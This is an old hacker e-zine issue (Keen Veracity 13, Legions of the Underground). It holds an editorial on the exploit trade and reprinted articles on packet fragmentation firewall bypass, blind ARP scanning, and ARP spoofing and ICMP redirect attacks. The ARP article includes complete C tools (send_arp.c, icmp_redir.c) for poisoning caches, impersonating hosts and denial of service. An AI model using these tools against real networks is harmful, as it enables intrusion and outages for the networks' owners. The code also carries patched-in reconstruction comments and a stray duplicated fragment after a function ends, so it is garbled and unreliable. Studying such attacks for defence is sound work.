--------------------------------------------------------------------------------
                           K e e n   V e r a c i t y
--------------------------------------------------------------------------------
                               I S S U E  (13)
              L e g i o n s   o f   t h e   U n d e r g r o u n d
-------------------------------------------------[www.legions.org]--------------
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
                       W W W . L E G I O N S . O R G
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]

[CONTENTS]------------------------------------------------------------[CONTENTS]
[1]===========================[Editorial - Archimedes ]
[2]==============[Best of KV Issue 3: Packet Fragmentation Attacks - Dr. Cohen ]
[3]=============[Blind Scanning using ARP - Case/Phriction ]
[4]=[Best of KV Issue 7: Playing redir games with ARP and ICMP - yuri volobuev ]
[5]===========[Best of KV Issue 10: NT Logging - NtWak0 - ]
[6]==[Blackboard 5 Password Enumeration - Case/Phriction - ]
[7]====================[ The InfoSec Art of war - VulnDev - ]
[8]=============================[Connect back shell in R - ]
[9]=======================[Insight into: Non-repressive Governments - The Barn]
[10]=========================[Snorting Cisco - Digital Ebola ]
[11]====================[Artificial Infosex - Datacide ]

--------------------------------------------------------------------------------
[Editorial]================================[Archimedes ]
--------------------------------------------------------------------------------

I'm sat here on a Sunday morning, about 12 months after KV13 was meant to be
released, with only a few things weighing on my mind (as far as KV readers are
concerned). Please bear in mind that these are only my musings, not always in
a coherent order.

Firstly: Oh god my head hurts.
Secondly: Oh god my head hurts.
Thirdly: Caffeine.

-- some time later --

Well, it has been a VERY long time since the last KV release. What, in my
opinion, has changed? (Other than the editor.) Not much. This is what concerns
me. There no longer seems to be such enthusiasm for exploit development and
research from the general community. Sadly, by now most of us know where our
"battle lines" are drawn. Those who don't are going to need to make their
minds up soon, I fear.

It really isn't that long ago that the security "industry" became a major
revenue earner. What really does concern me is that there are people out
there who are more concerned about who is going to give them the most money
for an exploit rather than the side-effects of putting it into the "public"
domain. I have spoken to people, mostly the "next generation", who are VERY
talented and DO have the enthusiasm. However, they have debts and see a
solution to these debts as being to sell their goods to "Security" companies.

We know that Microsoft has had "issues" with anti-competitiveness. We know
that Symantec now moderates the bugtraq list. We can assume that full
disclosure may not be around for much longer. We should ALL BE AWARE that
soon, unlicensed InfoSec research may be outlawed. Is it safe that there are
companies receiving information and exploits from all over the globe? Has
anyone looked at monopolies within InfoSec?
Imagine a company, Private Exploit Notification & Information Service. They
purchase exploits from the "underground". Now, with a bit of background
knowledge we know that is a major player in exploit research and development,
a lot of which can be linked to government funding. Does PEN&IS have any
"hackers" which it is sending cash to through Western Union? Is it paying the
government of a country it shouldn't be? If PEN&IS was being funded by a
would that be illegal? How do we, as researchers, know who we are giving our
research to? Are we providing weapons of war?

When will the move towards "Netcentric" warfare mean that exploits, such as
holes in BGP, can be life threatening? We already win wars by hitting critical
infrastructure with HE; that is tactics 101 (read VulnDev's publication
below). When will governments be hitting it with -1day's? Would this explain
the motions within the EU to ban exploit research, even including sections
that would make partaking in such discussions potentially illegal? Let's hope
not.

I truly hope that if your eyes are not open, they will be soon. Hence, it is
my honour-bound duty to present to you Keen Veracity 13 (albeit a partially
retro version). (Feel free to applaud, mock, heckle etc.)

My great thanks to those people who gave input (constructive and otherwise)
on this issue.

yours,
Archimedes
July 25th 2004

--------------------------------------------------------------------------------
[Packet Fragmentation Attacks]=======================================[Dr. Cohen]
--------------------------------------------------------------------------------

/* From Keen Veracity #3 */

ADVISORY: TCP packet fragment attacks against firewalls and filters
System: TCP/IP networks

Introduction to Packet Fragmentation

Packet fragmentation is the part of the Internet Protocol (IP) suite of
networking protocols that assures that IP datagrams can flow through any other
sort of network.
(For details, see Internet Request For Comments 791 (rfc791); the RFCs are
available and searchable in electronic form from Info-Sec heaven on the
World-Wide-Web at http://all.net, through gopher service at all.net, or by ftp
service from rs.internic.net.)

Fragmentation works by allowing datagrams created as a single packet to be
split into many smaller packets for transmission and reassembled at the
receiving host. Packet fragmentation is necessary because, underlying the IP
protocol, other physical and/or logical protocols are used to transport
packets through networks. A good example of this phenomenon is the difference
between Ethernet packets (which are limited to 1024 bytes), ATM packets (which
are limited to 56 bytes), and IP packets, which have variable sizes up to
about 1/2 million bytes in length.

The only exception to this rule is in the case of an internet datagram marked
"don't fragment". Any internet datagram marked in this way is supposed to not
be fragmented under any circumstances. If internet datagrams marked "don't
fragment" cannot be delivered to their destination without being fragmented,
they are supposed to be discarded instead. Of course, this rule doesn't have
to be obeyed by the IP software actually processing packets, but it is
supposed to be.

How Packet Reassembly Attacks Work

The packet fragmentation mechanism leads to attacks that bypass many current
Internet firewalls, but the reason these attacks work is not because of the
way fragmentation is done, but rather because of the way datagrams are
reassembled. Datagrams are supposed to be fragmented into packets that leave
the header portion of the packet intact except for the modification of the
fragmented-packet bit and the filling in of an offset field in the IP header
that indicates at which byte in the whole datagram the current packet is
supposed to start.

In reassembly, the IP reassembler creates a temporary packet with the
fragmented part of the datagram in place and adds incoming fragments by
placing their data fields at the specified offsets within the datagram being
reassembled. Once the whole datagram is reassembled, it is processed as if it
came in as a single packet.

According to the IP specification, fragmented packets are to be reassembled
at the receiving host. This presumably means that they are not supposed to be
reassembled at intermediate sites such as firewalls or routers. This decision
was made presumably to prevent repeated reassembly and refragmentation in
intermediate networks. When routers and firewalls followed the rules, they
found a peculiar problem.

The way firewalls and routers block specific services (such as telnet) while
allowing other services (such as the world wide web http service) is by
looking into the IP packet to determine which Transmission Control Protocol
(TCP) port is being used. If the port corresponds to 80, the datagram is
destined for http service, while port 23 is used for telnet. In normal
datagrams, this works fine. But suppose we didn't follow the rules for
fragmentation and created improper fragmented packets? Here's what one
attacker did:

* Create an initial packet which claims to be the first fragment of a
  multi-packet datagram. Specify TCP port 80 in the TCP header so it looks
  like a datagram going to http service, which is allowed to pass the
  firewall.

* The firewall passes the packet to the host under attack and passes
  subsequent packet fragments in order to allow the destination host to
  reassemble the packet.

* One of the subsequent packets has an offset of 0, which causes the
  reassembler to overwrite the initial part of the IP packet. This is the
  part of the IP packet that specifies the TCP port. The attacker overwrites
  the port number, which was originally 80, with a new port number such as
  23, and is now granted telnet access to the host under attack despite the
  firewall that is supposed to block the service.

--------------------------------------------------------------------------------
[Blind Scanning using ARP]===========================[Case ]
--------------------------------------------------------------------------------

With people becoming more and more aware of security threats every day, new
measures need to be constantly taken to bypass these security measures. I am
not writing this paper as a black hat or white hat but as someone who chooses
to freely disseminate information to the public; whether it be of a benign or
malignant nature is of no consequence.

##### Normal Scanning techniques #####

Port scanning has gradually progressed along the years, starting out from
something as simple as telnetting to individual ports, to programs or scripts
that make connect calls, and advancing to custom crafted packets that use
inherent weaknesses in protocols to glean information about hosts. NMAP, being
the most popular and efficient tool, takes advantage of scanning techniques
such as SYN, SYN/ACK, FIN, RST, NULL and so-called XMAS scans. These scans have
gained great popularity and are used frequently in probably most all port
scans today. The new technique of scanning I will show you soon is blind port
scanning, including IPID scanning, which is a feature in NMAP, and a new
technique I recently discovered, BARP or Broadcast ARP scanning: like a BURP
you can't see it but sometimes you can feel the effects.

Using normal TCP flag probing one can use a technique affectionately termed
"decoy" by NMAP. This technique is performed by sending packets with fake
source host addresses along with your own packets to mask where the apparent
scan is coming from.
Though this technique can work quite well, the scan can still usually be
traced back to one of two or three computers unless you used 100 decoys, in
which case the time it took to perform the scan would slow down significantly.

BARP scanning uses the TCP FIN or TCP NULL or TCP XMAS scanning techniques,
along with perhaps a TCP ACK scan to see if ports are filtered. The reason we
use FIN, NULL and XMAS is that when a port is probed with one of these types
of packets, the port in question should return a RST if the port is closed or
nothing if it is open. The host should, mind you, act this way, and we will
assume it does for this paper as we describe BARP scanning later.

##### Blind Port Scanning techniques #####

Blind port scanning techniques are based on the premise that you do not
actually have to send a packet from your host to the target host and have it
return the packet to your host. Instead, in some way you manipulate a packet
to exploit features in protocols. In this paper I will cover IPID scanning and
finally BARP scanning.

##### IPID Scanning #####

IPID scanning, or idle host scanning, is a blind port scanning technique
taking advantage of a predictably incremented IP ID value in a packet. To do
this, a person finds an idle host, host idle, and forges packets from host
idle to target host. Now if we perform a SYN scan on target host and the port
is closed, it will send a RST packet back to host idle, which will drop it,
end of story; but if the port is open, a subsequent SYN/ACK will be sent to
host idle and host idle will reply to target host with a RST to end the
communication, involuntarily incrementing its IP ID value. So after each
forged packet we send from host idle to target host, we probe host idle's IP
ID number to see if it has incremented. Check out NMAP and papers written by
Fyodor for more information on this subject.

http://www.insecure.org/nmap

##### BARP Scanning #####

BARP scanning is based on the concept that when a packet is sent from host A
to nonexistent host B, the host one hop before B will send an ARP broadcast
in an effort to locate host B. Voila, commence BARP scans. So we should now
understand the basic concept and be able to exploit this feature to perform
blind port scans or ping scans.

First we find a host on our subnet that does not exist, host none. Now we
forge a FIN packet from host none to our target host. And we wait and listen
for ARP broadcasts. Now if we receive a broadcast looking for the hardware
address of host none, we know that the target host must have sent a packet
back. Since FIN packets only return RSTs when the ports are closed, we have
found a closed port. Now if on the next packet sent no ARP broadcast is
snooped, we know that the port is most likely open. The magic of great blind
scans begins.

The problem is the scan can be narrowed down to your subnet; the benefit is
that it can be one of 253 computers. Now you can perform anonymous port scans
on any host! The hardware address in the Ethernet header of the packet before
it hits the first router might be your only concern if it is logged, so don't
bequeath yourself the task of taking out .govs and .microsoft.coms,
grasshopper, until you have understood this fact and taken care of it.

I'm a chunky monkey from funkytown...

code at: http://www.legions.org/~phric/arpscan.c
Questions, comments: email phric@legions.org.

--------------------------------------------------------------------------------
[Playing redir games with ARP and ICMP]==========================[yuri volobuev]
--------------------------------------------------------------------------------

/* From Keen Veracity #7 */

[ -Intro- ]

There're bugs and there're features. All too often the distinction between the
two is in the eye of the beholder.
I'd like to show how two legitimate protocols, ARP and ICMP, while properly
implemented, can be used to achieve something which is, well, not desirable.
While passive attacks (sniffing) that take advantage of root access to a LAN
are extremely popular and every half-way decent root kit has some kind of a
net sniffer, active attacks are not nearly as widespread. Yet, active
participation in the life of your LAN may bring lots of fun and joy. You knew
that already, it's just that technical details had been somewhat obscure. So,
let there be more light.

Possibilities outlined here include spoofing and DoS. While other means of
spoofing, such as IP blind spoofing, are more general and powerful in terms
of who can use them, they require quite a lot of (guess)work and may be hard
to implement. ARP spoofing, on the contrary, is very easy and robust. While
ARP spoofing is only possible on a local network, it may be a serious concern
as a way to extend an already existing security breach. If somebody can break
into one machine on a subnet, ARP spoofing can be used to compromise the rest
of it.

[ -Background on ARP- ]

[well, originally i wrote a few paragraphs outlining arp, but then i figured
that if you didn't know how it works already, you'll need to learn it from a
better source. I recommend "TCP/IP Illustrated" by W. Richard Stevens.]

[ -What can be done- ]

Let's consider a hypothetical network

    IP        10.0.0.1   10.0.0.2   10.0.0.3   10.0.0.4
    hostname  cat        rat        dog        bat
    hw addr   AA:AA      BB:BB      CC:CC      DD:DD   (for short)

all connected by Ethernet in some simple way (i.e. no switches, no smart
hubs). You're on cat, you have root and desire to break into dog. You know
that dog trusts rat, so if you can successfully spoof rat, something can be
gained.

First thing that comes to mind (I think everybody was thinking about this at
some point) is "why don't I set my IP to the IP of that other machine
and..." That won't work, at least it won't work reliably. If you tell the
Ethernet driver on cat that its IP is 10.0.0.2, it'll start answering ARP
requests to that IP. But so will rat. It's a pure race condition, and there's
no winner. However, you can easily be the loser, because this particular
situation happens quite often when some box is misconfigured to use somebody
else's IP, so many implementations immediately notice that and loudly
complain. Many network traffic analyzers flag that, too. Seeing a syslog
message saying something nasty (mentioning cat's Ethernet address) on the LAN
admin's console is not quite what you want. And what you want you won't
necessarily get, that is, anything remotely close to a working connection.

This of course can be helped. The attached program, send_arp.c, can be a
useful tool. Just as its name says, it sends an ARP packet [ARP reply, to be
exact: since the protocol is stateless, the reply will be happily accepted
even if no one ever asked for it. A request would do just as well, though,
because of the ARP caching logic] to the net, and you can make this packet
be what you want. What you want is an ability to specify source and target IP
and hardware addresses.

First, you don't want your Ethernet driver to talk too much, and it's easy to
accomplish with ifconfig -arp. Of course, it'll need ARP info anyway, so
you'll have to feed it to the kernel manually with arp(8). The critical part
is convincing your neighbours. In the case being described here, you want dog
to believe that rat's hardware address is that of cat (AA:AA), so you send an
ARP reply with source IP 10.0.0.2, source hw address AA:AA, target IP address
10.0.0.3 and target hardware address CC:CC. Now, for all dog knows, rat is at
AA:AA. The cache entry would expire, of course, so it needs to be updated
(the request needs to be resent). How often depends on the particular system,
but every 40 sec or so should be sufficient for most cases. Send it more
often if you want, it won't hurt.

A complication here could come from an ARP caching implementation feature.
Some systems (e.g. Linux) would try to update their cache entries by sending
a unicast ARP request to the cached address (like your wife calling you just
to make sure you're there). Such a request can screw things up, because it
could change the victim's ARP entry that we just faked, so it must be
prevented. This can be accomplished by feeding the "wife" system with replies
so that it never has to ask for it. Prevention is the best cure, as always.
This time, a real packet from dog to rat should be sent; it's just that cat
will be sending it, not dog, but for rat there's no way to tell. Again, doing
it about every 40 sec is usually OK.

So the procedure is simple. Bring up an alias interface, e.g. eth0:1 (or use
your current one, whatever), with rat's IP and ARP on -- you need to set up
some cache entries first, and it won't work on a non-arp interface. Set up a
host route entry for dog through the right interface. Set up a cache entry
for dog, turn off arp, and it's all set. Now, inject the venom with send_arp
(hitting both dog and rat) and for all dog knows, you're on rat. Just
remember to keep sending those ARP packets to dog and rat.

This attack only works on the local network, of course (in general, it can
reach as far as ARP packets can get, usually not too far because ARP packets
are almost never routed). But an interesting extension here is taking this
outside by replacing dog's hardware address in the above plan with the
router's. If it works (I'm not sure it always will, a router's ARP
implementation may be tougher to fool, and since I don't want to try it on
real routers, I don't know, but there's no simple reason why not) you can
easily impersonate any machine on the local network to the rest of the world.
So the target machine could really be anywhere, but the machine you're
impersonating must be on the same LAN.

[ -What else can be done- ]

Aside from spoofing, there's a range of other things you can do with ARP. The
sky is really the limit here. DoS is the most obvious application. Feeding
the victim a wrong hardware address is a powerful way to make it mute. You
can prevent it from talking to any particular machine (and the ARP cache size
usually allows for the whole network to fit in, so effectively you can stop
it from talking to everybody for some time). The obvious target would be the
router. Cache poisoning again should be two-way: both the victim system and
the system you don't want the victim to talk to should be fed.

The simplest case would be feeding a non-existent address. It's not the most
efficient, though, as the system will quickly realize that it's talking to
nobody and send out an ARP request. Of course, your next drop of poison will
nullify this, but you have to do it quite often. A more efficient approach
here is feeding the victim with the hardware address of the wrong machine,
which itself is alive and well. Again, it depends on the particular
situation, but very often what happens is that the victim keeps sending out
packets of various types that arrive at the wrong destination, and the
destination system will promptly send ICMP Xxx Unreachable messages back,
thus emulating a connection in some perverted way. This pseudo-connection can
easily postpone cache expiry. On Linux, for example, a pseudo-connection
raises cache expiry from the usual 1 min to about 10 min. By that time, most
or all TCP connections are screwed up. Could be quite annoying. This way, one
ARP packet can screw someone.

An interesting twist here is so-called "gratuitous ARP". It's when the source
and target IPs in the ARP request are the same, and it usually appears in the
form of an Ethernet broadcast. Some implementations recognize it as a special
case, that of a system sending out updated information about itself to
everybody, and cache that request. This way one packet could screw up the
entire network.
It must be admitted, though, that gratuitous ARP is not really defined as a
part of ARP, so it's up to the vendor to (not) implement it, and it's
becoming increasingly less popular.

ARP is a serious tool for professional practical jokes, too. Just imagine
somebody setting up a relay, or tunnel, in the form of their own machine that
convinced two neighbours to send their packets intended for each other to the
relay's Ethernet. If the relay just forwards packets to their real
destinations, no one would even notice. However, some simple data stream
modifications could have quite a spectacular effect on one's mental health. A
simple, CPU-inexpensive "filter" could be swapping two random bytes at
irregular long intervals. If it hits the data portion, most of the checksums
won't change, i.e. the data stream would seem to be intact, yet strange and
inexplicable things _will_ happen for no apparent reason.

[ -ICMP redirects- ]

An effect somewhat similar to ARP cache poisoning can be achieved in a
different way, again using a legitimate protocol feature, ICMP route
redirects. Such a redirect is normally sent by the default router to the
system to indicate that there's a shorter route to some particular
destination. Originally, both network and host route redirects were proposed,
but later net redirects were deprecated and now are usually treated as host
redirects. A properly constructed ICMP packet that passes all sanity checks
(it must come from the default router for the destination it's redirecting,
the new router should be on a directly connected network, etc.) causes a
host-route entry to be added to the system routing table. The concept is just
as secure as ICMP itself, i.e. (security)NULL. Spoofing the router's IP
address is simple, and the attached icmp_redir.c does just that. The Host
Requirements RFC states that a system MUST follow ICMP redirects unless it's
a router. And indeed all the systems I've tried happily accept it (except
vanilla Linux 2.0.30, where it's broken; it works in 2.0.29 and 2.0.31pre9,
according to Alan Cox).

ICMP redirects present a rather potent DoS. Unlike ARP cache entries, those
host routes won't expire with time. And of course no access to the local
network is required; the attack can be launched from anywhere. So if the
target system does accept ICMP redirects (and packets can actually reach it)
that system can be stopped from talking to any particular address on the net
(well, not all, but those that aren't on the same subnet with the target).
Nameservers would be an obvious target.

[ -What can be done about it- ]

ARP is a low level protocol and as such is usually hidden from normal people.
LAN admins may be concerned with it at times, but if all goes well no one
pays attention. One can always inspect the contents of the ARP cache using
arp(8), especially if there's some mysterious network problem, but again it's
not the first thing that comes to mind. Even W95 has an arp command, and
remembering about it may be helpful in certain situations. However, if you're
the target of an attack originating from another network via gateway arp
spoofing, there's no way to tell. Similarly, the host routing table could be
examined to spot ICMP-generated entries (in most versions of route(1) they
are marked with the letter D in the flags field). Just be aware.

The above ARP attack scheme works perfectly for plain old 10Base2 Ethernet.
However, if machines are interconnected in some more advanced way,
particularly using some smart hubs or switches, the attack can be more
visible or even impossible (same goes for passive attacks). So there's yet
another reason to invest in a good piece of network equipment. A good deal of
peace of mind may just come with it.

In general, however, I personally find it rather sad that things like ICMP
redirects were made a default. First, it's often not necessary because many
networks have a very simple structure and there's never a need for anything
in addition to the usual routing table. Second, on more sophisticated
networks the routing table can be just as well set manually; it's not really
such a dynamic thing, so why do it via ICMP? And finally, it's dangerous, so
I would like to disable it on my systems, even though it'll make them less
compliant with RFC1122. Alas, it may not be easy. On Linux or any other OS
with sources available, I can at least hack the kernel and #define it out. On
Irix 6.2 and possibly other versions one can set icmp_dropredirects=1 with
systune (I'm genuinely surprised to see it there, I really am). Other OSes
can be configurable, too; I have no information.

With ARP, we basically face a situation where the problem of name resolution
is solved dynamically without a centralized server. It doesn't have to be
this way. When one wants to map a hostname to an IP, a nameserver is queried
or /etc/hosts is consulted, i.e. there's some static mapping established. I
don't see why a similar thing can't be done with ARP. Ethernet hardware
addresses don't change too often, and when they do change, it won't kill the
net admin to change the corresponding map. Ethernet can be forced into no-arp
mode; you just need to make sure your ARP cache has all the entries made
permanent. As a bonus, this will reduce network traffic somewhat. Standard
procedures can be used to distribute the ARP map, e.g. rdist, rsync (I would
say NIS, but if you use NIS, ARP is probably not your top security concern
anyway). The old tradition of /etc/ethers can be brought back to life. But
getting a kick-ass Ethernet switch still looks better to me (paying for it
does not, though).

And old wisdom still shines bright through time: don't use hostname-only
based auth. Those who do shall have no mercy from the net gods.

cheers,
yuri

P.S.
On Firewalls

I anticipate that many of you, having read the section about ICMP, are
already flexing the fingers preparing to write a follow-up explaining that
all those ICMP packets can be filtered out on the firewall, thus it's not a
problem. Please don't. I'm well aware of the concept. And if you feel you
absolutely have to, don't cc the list needlessly.

I have to note that many people use "i have a firewall, and I like it,
therefore everyone else should get one or get lost" logic to argue that
certain security problems are less serious because they can be effectively
eliminated by putting a firewall between the protected network and the
Internet. While I fully agree that having a firewall is very good for
security, I want to note that it's not always possible or effective. Imagine
an environment where all machines are directly connected to the Internet,
you have to share a subnet with people you don't know who have vanilla SGI
boxes screaming "hack me pleeeease, my vendor did such a great job of making
it eeeeeeasy" all over the place (and sure, these people know Unix, they've
seen it in Jurassic Park... and that would be about it), and the router to
your subnet is controlled by a separate organization. Welcome to a standard
academic environment, where people don't use firewalls. In fact, in some of
those environments one would be useful to protect the outside world from the
people on the inside. Still, people work there, and use computers, too. And
that's where per-host security solutions are necessary; it's a jungle where
every host is for itself. So please, next time you think "firewall",
remember, it's not for everyone.

CUT HERE

/* send_arp.c

This program sends out one ARP packet with source/target IP and Ethernet
hardware addresses supplied by the user. It compiles and works on Linux and
will probably work on any Unix that has SOCK_PACKET.

The idea behind this program is a proof of a concept, nothing more. It comes
as is, no warranty. However, you're allowed to use it under one condition:
you must use your brain simultaneously. If this condition is not met, you
shall forget about this program and go RTFM immediately.

yuri volobuev'97
volobuev@t1.chem.umn.edu
*/

/* The header names were lost when this issue was extracted; this set
   supplies everything the program uses (socket()/SOCK_PACKET/ETH_P_RARP,
   inet_addr(), gethostbyname(), tolower(), bcopy()). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <linux/if_ether.h>

#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2     /* opcode 2 is an ARP reply, as the text above notes */
#define DEFAULT_DEVICE "eth0"

char usage[]={"send_arp: sends out custom ARP packet. yuri volobuev'97\n\
\tusage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr\n\n"};

struct arp_packet {
	u_char targ_hw_addr[ETH_HW_ADDR_LEN];	/* Ethernet header: dst, src, type */
	u_char src_hw_addr[ETH_HW_ADDR_LEN];
	u_short frame_type;
	u_short hw_type;			/* ARP body */
	u_short prot_type;
	u_char hw_addr_size;
	u_char prot_addr_size;
	u_short op;
	u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
	u_char sndr_ip_addr[IP_ADDR_LEN];
	u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
	u_char rcpt_ip_addr[IP_ADDR_LEN];
	u_char padding[18];			/* pad to the Ethernet minimum frame */
};

void die(char *);
void get_ip_addr(struct in_addr*,char*);
void get_hw_addr(char*,char*);

int main(int argc,char** argv){
	struct in_addr src_in_addr,targ_in_addr;
	struct arp_packet pkt;
	struct sockaddr sa;
	int sock;

	if(argc != 5)die(usage);

	sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP));
	if(sock<0){
		perror("socket");
		exit(1);
	}

	pkt.frame_type = htons(ARP_FRAME_TYPE);
	pkt.hw_type = htons(ETHER_HW_TYPE);
	pkt.prot_type = htons(IP_PROTO_TYPE);
	pkt.hw_addr_size = ETH_HW_ADDR_LEN;
	pkt.prot_addr_size = IP_ADDR_LEN;
	pkt.op=htons(OP_ARP_REQUEST);

	get_hw_addr(pkt.targ_hw_addr,argv[4]);
	get_hw_addr(pkt.rcpt_hw_addr,argv[4]);
	get_hw_addr(pkt.src_hw_addr,argv[2]);
	get_hw_addr(pkt.sndr_hw_addr,argv[2]);

	get_ip_addr(&src_in_addr,argv[1]);
	get_ip_addr(&targ_in_addr,argv[3]);

	memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN);
	memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN);

	bzero(pkt.padding,18);

	memset(&sa,0,sizeof(sa));	/* sa was left uninitialised in the original */
	sa.sa_family = AF_INET;
	strcpy(sa.sa_data,DEFAULT_DEVICE);	/* SOCK_PACKET takes the interface name here */
	if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0){
		perror("sendto");
		exit(1);
	}
	exit(0);
}

void die(char* str){
	fprintf(stderr,"%s\n",str);
	exit(1);
}

void get_ip_addr(struct in_addr* in_addr,char* str){
	struct hostent *hostp;

	in_addr->s_addr=inet_addr(str);
	if(in_addr->s_addr == INADDR_NONE){
		if( (hostp = gethostbyname(str)))
			bcopy(hostp->h_addr,in_addr,hostp->h_length);
		else {
			fprintf(stderr,"send_arp: unknown host %s\n",str);
			exit(1);
		}
	}
}

/* Parse "aa:bb:cc:dd:ee:ff" into six raw bytes, two hex digits per byte. */
void get_hw_addr(char* buf,char* str){
	int i;
	char c,val;

	for(i=0;i<ETH_HW_ADDR_LEN;i++){
		if( !(c = tolower(*str++))) die("Invalid hardware address");
		if(isdigit(c)) val = c-'0';
		else if(c >= 'a' && c <= 'f') val = c-'a'+10;
		else die("Invalid hardware address");
		*buf = val << 4;
		if( !(c = tolower(*str++))) die("Invalid hardware address");
		if(isdigit(c)) val = c-'0';
		else if(c >= 'a' && c <= 'f') val = c-'a'+10;
		else die("Invalid hardware address");
		*buf++ |= val;

		if(*str == ':')str++;
	}
}

CUT HERE

/* icmp_redir.c

This program sends out an ICMP host redirect packet with gateway IP supplied
by the user. It was written and tested under Linux 2.0.30 and could be rather
easily modified to work on most Unices.

The idea behind this program is a proof of a concept, nothing more. It comes
as is, no warranty. However, you're allowed to use it under one condition:
you must use your brain simultaneously. If this condition is not met, you
shall forget about this program and go RTFM immediately.

yuri volobuev'97
volobuev@t1.chem.umn.edu
*/

/* The header names were lost in extraction; this set supplies raw sockets,
   struct iphdr/icmphdr and the ICMP_REDIRECT constants on Linux/glibc. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifndef IPVERSION
#define IPVERSION 4
#endif

struct raw_pkt {
	struct iphdr ip;	/* This is Linux-style iphdr. Use BSD-style struct ip if you want */
	struct icmphdr icmp;
	struct iphdr encl_iphdr;	/* the datagram the redirect claims to be about */
	char encl_ip_data[8];
};

struct raw_pkt* pkt;

void die(char *);
in_addr_t get_ip_addr(char*);
unsigned short checksum(unsigned short*,char);

int main(int argc,char** argv){
	struct sockaddr_in sa;
	int sock,packet_len;
	char usage[]={"icmp_redir: send out custom ICMP host redirect packet. \
yuri volobuev'97\n\
usage: icmp_redir gw_host targ_host dst_host dummy_host\n"};
	int on = 1;	/* the original declared this as char; setsockopt expects an int */

	if(argc != 5)die(usage);

	if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
		perror("socket");
		exit(1);
	}

	memset(&sa,0,sizeof(sa));
	sa.sin_addr.s_addr = get_ip_addr(argv[2]);
	sa.sin_family = AF_INET;

	packet_len = sizeof(struct raw_pkt);
	pkt = calloc((size_t)1,(size_t)packet_len);

	pkt->ip.version = IPVERSION;
	pkt->ip.ihl = sizeof(struct iphdr) >> 2;
	pkt->ip.tos = 0;
	pkt->ip.tot_len = htons(packet_len);
	pkt->ip.id = htons(getpid() & 0xFFFF);
	pkt->ip.frag_off = 0;
	pkt->ip.ttl = 0x40;
	pkt->ip.protocol = IPPROTO_ICMP;
	pkt->ip.check = 0;
	pkt->ip.saddr = get_ip_addr(argv[1]);	/* claims to come from the gateway */
	pkt->ip.daddr = sa.sin_addr.s_addr;
	pkt->ip.check = checksum((unsigned short*)pkt,sizeof(struct iphdr));

	pkt->icmp.type = ICMP_REDIRECT;
	pkt->icmp.code = ICMP_REDIR_HOST;
	pkt->icmp.checksum = 0;
	pkt->icmp.un.gateway = get_ip_addr(argv[4]);

	memcpy(&(pkt->encl_iphdr),pkt,sizeof(struct iphdr));
	pkt->encl_iphdr.protocol = IPPROTO_IP;
	pkt->encl_iphdr.saddr = get_ip_addr(argv[2]);
	pkt->encl_iphdr.daddr = get_ip_addr(argv[3]);
	pkt->encl_iphdr.check = 0;
	pkt->encl_iphdr.check = checksum((unsigned short*)&(pkt->encl_iphdr),
					 sizeof(struct iphdr));

	pkt->icmp.checksum = checksum((unsigned short*)&(pkt->icmp),
				      sizeof(struct raw_pkt)-sizeof(struct iphdr));

	if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) {
		perror("setsockopt: IP_HDRINCL");
		exit(1);
	}

	if(sendto(sock,pkt,packet_len,0,(struct sockaddr*)&sa,sizeof(sa)) < 0){
		perror("sendto");
		exit(1);
	}
	exit(0);
}

void die(char* str){
	fprintf(stderr,"%s\n",str);
	exit(1);
}

/* Returned unsigned long in the original, which never compares equal to -1
   on a 64-bit host; in_addr_t and INADDR_NONE give the intended check. */
in_addr_t get_ip_addr(char* str){
	struct hostent *hostp;
	in_addr_t addr;

	if( (addr = inet_addr(str)) == INADDR_NONE){
		if( (hostp = gethostbyname(str)))
			return *(in_addr_t*)(hostp->h_addr);
		else {
			fprintf(stderr,"unknown host %s\n",str);
			exit(1);
		}
	}
	return addr;
}

/* Standard Internet checksum (RFC 1071) over len bytes. */
unsigned short checksum(unsigned short* addr,char len){
	register long sum = 0;

	while(len > 1){
		sum += *addr++;
		len -= 2;
	}
	/* The issue's text cuts off at this point; the lines below are the
	   usual odd-byte and carry folding that completes the function. */
	if(len == 1)
		sum += *(unsigned char*)addr;
	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	return (unsigned short)~sum;
}
if(len > 0) sum += *addr; while (sum>>16) sum = (sum & 0xffff) + (sum >> 16); return ~sum; } -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- [NT Logging]======================================[NtWak0 ] -------------------------------------------------------------------------------- /* From Keen Veracity #10 */ +-----------------------------------------------------------------------------+ |Author : NtWaK0 | |Crew : Legions Of the Underound | |Subject: NT LOGGING | |Date: Sep-3-2000 | +-----------------------------------------------------------------------------+ INTRODUCTION ============ Many peoples asked me about NT and where are THESE logs,so here we go something I can think of about NT monitoring that will help NT admins and others peoples too :) First Let US Start With a Breif Description Of NT Logs. NT LOGS DESCRIPTION =================== Thier is no magic in NT logs like the UNIX logging.To manager you NT logs you have to use "Event Viewer". What is "Event Viewer", WELL IF YOU CLICK THE HELP IN NT VIEWER you will get a nice description.: Event Viewer is the tool you can use to monitor events in your system. You can use Event Viewer to view and manage System, Security, and Application event logs. You can also archive event logs. The event-logging service starts automatically when you run Windows NT. You can stop event logging with 